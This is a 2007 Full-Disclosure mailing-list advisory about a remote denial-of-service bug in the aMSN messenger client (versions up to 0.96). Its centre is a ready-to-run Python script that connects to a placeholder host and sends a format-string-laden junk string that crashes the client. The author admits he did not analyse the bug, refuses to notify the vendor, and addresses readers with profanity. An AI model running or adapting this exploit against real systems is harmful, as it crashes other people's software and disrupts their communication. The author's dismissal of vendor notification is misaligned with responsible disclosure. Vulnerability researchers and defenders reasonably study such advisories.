Date: Sat, 21 Apr 2007 04:35:28 +0200
From: Levent Kayan <levent@...ehack.org>
To: full-disclosure@...ts.grok.org.uk
Subject: aMSN <= 0.96 remote DoS vulnerability

/*
 * bug: amsn remote DoS vulnerability
 * affected version: <= 0.96
 * site: http://amsn-project.net/
 * tested: amsn-0.96 on freebsd 6.2
 *
 * author: levent kayan
 * date: Tue Mar 27 16:04:51 CEST 2007
 * www.corehack.org
 */

/* Introduction */
amsn is a free open source MSN Messenger clone.

/* Technical details */
While fuzzing some instant-messaging applications, I found a basic bug in amsn.
I just sent some characters to that amsn port and noticed that it
reported an error and was killed. I didn't analyse the bug though.
Maybe you're interested in doing so. :P
The following python script is enough to produce a DoS attack and kill
the client:

---fuck off here---

import socket

HOST = 'victim.com'
PORT = 31337 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
   s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
          °!"§$%&/()=?`#+#-.,;:_ÄÖÜäöü%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
          %n%n%n%n%n%n\³²¹³#²[{#³]²#\`~··')

---fuck off here---

I think it was the characters '}', '{' or '%x', '%n'. Try to determine this for
yourself! Don't bug me with this shit.

/* Vendor contacted? */
NO! Why should I contact them? :) lol, go away and contact them yourself.

/* EOF */

-- 
Name: Levent Kayan
E-Mail: levent@...ehack.org
GPG key: 
0xd6794965
Key fingerprint:
FD20 03C3 DD7F 51BB 224F  F11E 0855 23C8 D679 4965
Website:
http://www.corehack.org/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
